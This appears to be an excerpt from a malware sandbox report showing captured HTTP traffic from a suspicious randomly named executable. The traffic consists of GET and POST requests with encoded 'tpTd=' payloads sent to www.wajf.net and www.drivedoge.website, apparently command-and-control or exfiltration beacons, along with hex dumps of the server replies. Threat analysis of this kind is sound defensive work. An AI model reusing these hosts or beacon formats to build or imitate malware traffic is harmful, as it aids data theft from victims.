                                                                                                                                                                                                              Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959006071 CEST1236INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                                                                                                                                                                                              Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959029913 CEST1236INData Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                              Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959044933 CEST1236INData Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
                                                                                                                                                                                                              Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960849047 CEST421INData Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
                                                                                                                                                                                                              Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              40192.168.2.9608553.91.127.116801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.000379086 CEST469OUTGET /eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.wajf.net
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447664976 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:39 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 32 32 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2273<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447699070 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447715044 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                              Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447725058 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                                                                                                                                                                                              Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447745085 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                                                                                                                                                                                              Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447755098 CEST1120INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                                                                                                                                                                                              Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447787046 CEST1236INData Raw: 37 31 2c 31 2e 33 30 39 37 31 2c 30 2c 30 2c 31 2c 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 34 38 30 2e 32 34 35 35 39 2c 33 37 2e 38 33 33 39 34
                                                                                                                                                                                                              Data Ascii: 71,1.30971,0,0,1,552.26,49.575Z" class="cls-2"></path><path d="M480.24559,37.83394l-2.8652,4.96934a1.314,1.314,0,0,1-1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.194
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447798967 CEST1236INData Raw: 35 36 2e 36 39 38 31 33 2d 31 2e 32 35 35 32 39 76 2d 37 33 2e 32 36 36 61 32 2e 35 36 31 2c 32 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 34 35 31 36 2d 32 2e 36 34 38 35 32 48 37 35 2e 36 33 38 36 32 61 32 2e 35 36 31 36 35 2c 32 2e 35 36 31 36
                                                                                                                                                                                                              Data Ascii: 56.69813-1.25529v-73.266a2.561,2.561,0,0,1,2.64516-2.64852H75.63862a2.56165,2.56165,0,0,1,2.64482,2.64852v95.27978A5.5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448275089 CEST1236INData Raw: 30 35 36 35 2c 32 38 2e 31 33 38 31 38 2d 32 36 2e 36 30 35 36 35 68 33 2e 33 34 33 63 37 2e 38 30 30 32 31 2c 30 2c 31 34 2e 30 36 37 35 37 2c 31 2e 38 31 30 34 33 2c 31 38 2e 33 38 36 35 35 2c 35 2e 35 37 32 35 39 2c 34 2e 33 31 39 2d 33 2e 37
                                                                                                                                                                                                              Data Ascii: 0565,28.13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"><
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448286057 CEST1236INData Raw: 30 2d 31 33 2e 32 34 34 36 32 2c 37 2e 39 36 37 37 34 2d 31 39 2e 37 34 36 38 33 2c 31 38 2e 35 32 37 35 31 2d 31 39 2e 37 34 36 38 33 61 34 34 2e 35 37 39 32 2c 34 34 2e 35 37 39 32 2c 30 2c 30 2c 31 2c 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 38
                                                                                                                                                                                                              Data Ascii: 0-13.24462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448307991 CEST544INData Raw: 33 36 32 2d 36 2e 35 38 31 32 37 68 2d 31 2e 39 35 35 31 63 2d 33 2e 37 33 32 35 36 2c 30 2d 35 2e 36 38 34 32 39 2c 31 2e 30 35 34 37 37 2d 35 2e 36 38 34 32 39 2c 36 2e 35 38 31 32 37 76 32 39 2e 31 36 33 33 33 61 31 2e 36 33 36 2c 31 2e 36 33
                                                                                                                                                                                                              Data Ascii: 362-6.58127h-1.9551c-3.73256,0-5.68429,1.05477-5.68429,6.58127v29.16333a1.636,1.636,0,0,1-1.54733,1.71185H827.2866a1.63824,1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              41192.168.2.960856195.161.68.8801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.609220028 CEST746OUTPOST /c6cw/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.drivedoge.website
                                                                                                                                                                                                              Origin: http://www.drivedoge.website
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.drivedoge.website/c6cw/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 49 6f 75 55 33 41 74 76 39 31 55 35 72 75 65 63 35 76 35 62 72 36 64 5a 79 4f 63 51 6f 4d 48 6a 63 48 44 67 4b 36 6a 54 5a 52 78 34 50 50 4e 50 2f 70 56 7a 4f 53 53 71 36 63 30 65 59 32 6d 6e 52 2f 47 34 6f 2f 61 79 78 35 65 76 5a 35 6f 68 69 76 7a 38 6e 58 38 6b 54 4b 68 4e 38 68 4b 48 52 44 57 4d 68 32 35 50 47 65 4c 74 6c 73 6b 69 4c 70 73 56 37 31 2b 76 31 47 58 4b 63 33 35 64 49 6d 31 52 77 41 32 63 42 53 63 34 62 5a 6e 51 49 2f 2f 65 78 36 55 75 78 51 32 4d 4d 59 56 57 66 56 38 2b 68 69 48 7a 4c 57 42 77 7a 37 41 48 6e 4a 30 64 50 72 64 70 48 37 48 62
                                                                                                                                                                                                              Data Ascii: tpTd=IouU3Atv91U5ruec5v5br6dZyOcQoMHjcHDgK6jTZRx4PPNP/pVzOSSq6c0eY2mnR/G4o/ayx5evZ5ohivz8nX8kTKhN8hKHRDWMh25PGeLtlskiLpsV71+v1GXKc35dIm1RwA2cBSc4bZnQI//ex6UuxQ2MMYVWfV8+hiHzLWBwz7AHnJ0dPrdpH7Hb
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350007057 CEST778INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:45 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 634
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              42192.168.2.960857195.161.68.8801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.166169882 CEST770OUTPOST /c6cw/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.drivedoge.website
                                                                                                                                                                                                              Origin: http://www.drivedoge.website
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.drivedoge.website/c6cw/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 49 6f 75 55 33 41 74 76 39 31 55 35 70 50 75 63 71 63 52 62 6e 4b 64 47 2b 75 63 51 6d 73 48 76 63 47 2f 67 4b 2f 43 49 5a 6a 56 34 50 75 39 50 34 6f 56 7a 4c 53 53 71 6a 73 30 62 57 57 6d 38 52 2f 61 47 6f 2f 6d 79 78 35 69 76 5a 37 67 68 6a 59 48 2f 6d 48 38 71 63 71 68 31 6a 78 4b 48 52 44 57 4d 68 32 45 59 47 65 44 74 6c 64 55 69 4b 4c 55 57 79 56 2b 73 79 47 58 4b 57 6e 35 5a 49 6d 31 4a 77 42 71 36 42 52 6b 34 62 59 58 51 49 72 72 5a 37 36 55 67 73 67 33 68 66 59 67 49 58 56 73 57 69 68 7a 59 5a 57 4a 74 39 36 67 5a 32 37 39 47 61 38 64 4f 41 63 4f 7a 72 42 46 5a 6a 6d 34 43 59 52 4e 56 75 66 78 65 65 46 59 6b 58 51 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=IouU3Atv91U5pPucqcRbnKdG+ucQmsHvcG/gK/CIZjV4Pu9P4oVzLSSqjs0bWWm8R/aGo/myx5ivZ7ghjYH/mH8qcqh1jxKHRDWMh2EYGeDtldUiKLUWyV+syGXKWn5ZIm1JwBq6BRk4bYXQIrrZ76Ugsg3hfYgIXVsWihzYZWJt96gZ279Ga8dOAcOzrBFZjm4CYRNVufxeeFYkXQ==
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.871860981 CEST778INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:47 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 634
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              43192.168.2.960858195.161.68.8801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.712145090 CEST1783OUTPOST /c6cw/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.drivedoge.website
                                                                                                                                                                                                              Origin: http://www.drivedoge.website
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.drivedoge.website/c6cw/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 49 6f 75 55 33 41 74 76 39 31 55 35 70 50 75 63 71 63 52 62 6e 4b 64 47 2b 75 63 51 6d 73 48 76 63 47 2f 67 4b 2f 43 49 5a 6a 64 34 50 38 5a 50 2b 4c 39 7a 49 53 53 71 38 63 30 61 57 57 6e 73 52 2f 43 43 6f 2f 72 48 78 2f 75 76 59 59 34 68 79 63 62 2f 73 48 38 71 45 61 68 4f 38 68 4b 53 52 44 47 49 68 33 34 59 47 65 44 74 6c 65 4d 69 65 70 73 57 30 56 2b 76 31 47 58 38 63 33 35 68 49 69 5a 33 77 42 65 4d 42 68 45 34 62 34 48 51 4c 59 54 5a 6d 71 55 31 76 67 33 35 66 59 38 70 58 56 78 36 69 67 48 79 5a 55 4a 74 2f 75 5a 6d 70 4b 4a 4c 45 4f 4a 6c 58 74 6d 77 71 58 70 78 6b 32 46 46 50 53 70 78 35 61 77 4b 66 30 4e 41 48 63 6b 6a 30 77 50 36 68 36 75 7a 4c 64 49 4b 31 45 30 56 64 4b 36 67 67 4b 30 4d 4f 30 33 72 70 70 76 4a 4b 4d 4a 47 57 52 49 31 44 36 33 68 6f 79 6f 35 53 31 32 41 76 33 70 67 30 45 63 43 6a 79 4e 33 51 44 4b 4d 38 41 5a 52 46 71 4f 34 43 69 4a 6a 5a 5a 42 36 6d 39 56 76 37 63 51 4d 76 6e 4e 79 39 75 44 47 44 75 72 58 6e 71 66 44 39 58 76 35 39 65 75 44 2b 59 35 45 49 [TRUNCATED]
